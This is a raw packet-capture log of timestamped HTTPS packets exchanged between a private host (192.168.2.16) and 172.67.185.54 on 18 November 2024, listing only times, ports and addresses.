                                                                                                                                                                                                                              Nov 18, 2024 00:15:43.970616102 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:43.970710993 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:43.970768929 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:43.970781088 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:43.970879078 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:43.970933914 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:43.970947027 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:43.971530914 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:43.971601963 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:43.971613884 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:43.971709013 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:44.789832115 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:44.789832115 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:44.789851904 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:44.789946079 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:44.790883064 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:44.790947914 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:44.790978909 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:44.790992975 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:44.791023970 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:44.791043043 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:44.908308983 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:44.908390999 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:44.908588886 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:44.908590078 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:44.908629894 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:44.908709049 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:44.908890963 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:44.908946991 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:44.908973932 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:44.908987045 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:44.909023046 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:44.909046888 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:44.950711966 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:44.950773001 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:44.950920105 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:44.950920105 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:44.950936079 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:44.951003075 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:45.027034044 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:45.027108908 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:45.027271986 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:45.027297020 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:45.027335882 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:45.027373075 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:45.027713060 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:45.027772903 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:45.027792931 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:45.027808905 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:45.027839899 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:45.027872086 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:45.069602013 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:45.069663048 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:45.069765091 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:45.069777966 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:45.069895029 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:45.113630056 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:45.113864899 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:45.145876884 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:45.145945072 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:45.146127939 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:45.146127939 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:45.146145105 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:45.188097000 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:45.188164949 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:45.188303947 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:45.188303947 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:45.188324928 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:45.232453108 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:45.232544899 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:45.232605934 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:45.232644081 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:45.232773066 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:45.264951944 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:45.264983892 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:45.265038013 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:45.265234947 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:45.265234947 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:45.265254021 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:45.307015896 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:45.307084084 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:45.307257891 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:45.307280064 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:45.307306051 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:45.350975037 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:45.351058006 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:45.351104975 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:45.351136923 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:45.351162910 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:45.351162910 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:45.351195097 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:45.351227045 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:45.351227045 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:45.383305073 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:45.383363008 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:45.383420944 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:45.383440971 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:45.383555889 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:45.383578062 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:45.383604050 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:45.425558090 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:45.425648928 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:45.425693989 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:45.425739050 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:45.425934076 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:45.425934076 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:45.425934076 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:46.138302088 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:46.140532017 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:46.140602112 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:46.140640020 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:46.140662909 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:46.140690088 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:46.191756964 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:46.214756012 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:46.214791059 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:46.214911938 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:46.215043068 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:46.215058088 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:46.215086937 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:46.215157032 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:46.215536118 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:46.215594053 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:46.215743065 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:46.215754032 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:46.215850115 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:46.256871939 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:46.256931067 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:46.257036924 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:46.257057905 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:46.257119894 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:46.257177114 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:46.257258892 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:46.257258892 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:46.257275105 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:46.257306099 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:46.257327080 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:46.335028887 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:46.335093021 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:46.335289001 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:46.335340023 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:46.335375071 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:46.335419893 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:46.335763931 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:46.335820913 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:46.335848093 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:46.335863113 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:46.335894108 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:46.335923910 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:46.336229086 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:46.336273909 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:46.336299896 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:46.336313009 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:46.336354971 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:46.336380005 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:46.375556946 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:46.375576973 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:46.375754118 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:46.375777006 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:46.375971079 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:46.377957106 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:46.377970934 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:46.378045082 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:46.378057957 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:46.378103971 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:46.452354908 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:46.452370882 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:46.452605009 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:46.452635050 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:46.452721119 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:46.453061104 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:46.453074932 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:46.453203917 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:46.453213930 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:46.453305960 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:46.454195023 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:46.454207897 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:46.454281092 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:46.454292059 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:46.454344034 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:46.497184992 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:46.497199059 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:46.497277021 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:46.497296095 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:46.497361898 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:46.537456036 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:46.537478924 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:46.537760973 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:46.537786007 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:46.537873983 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:46.572171926 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:46.572191954 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:46.572376966 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:46.572403908 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:46.572465897 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:46.572626114 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:46.572642088 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:46.572715998 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:46.572735071 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:46.572787046 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:46.573539019 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:46.573554039 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:46.573647022 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.166934013 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.166949034 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.167052031 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.167068958 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.167126894 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.167462111 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.167474031 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.167561054 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.167572975 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.167679071 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.167884111 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.167901993 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.167972088 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.167989969 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.168045044 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.168275118 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.168288946 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.168344021 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.168355942 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.168421030 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.208772898 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.208790064 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.209103107 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.209136963 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.209211111 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.209861994 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.209877968 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.209966898 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.209974051 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.210021019 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.210726023 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.210741997 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.210808992 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.210815907 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.210867882 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.285820007 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.285847902 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.285926104 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.285943031 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.285994053 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.286520958 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.286540985 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.286591053 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.286604881 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.286636114 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.286657095 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.287453890 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.287472010 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.287537098 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.287548065 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.287595987 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.325182915 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.325203896 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.325409889 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.325423002 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.325481892 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.328110933 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.328130007 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.328207016 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.328218937 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.328274965 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.328908920 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.328927994 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.328999996 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.329010963 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.329068899 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.329538107 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.329555988 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.329639912 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.329652071 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.329706907 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.404673100 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.404695034 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:47.404787064 CET44349717172.67.185.54192.168.2.16
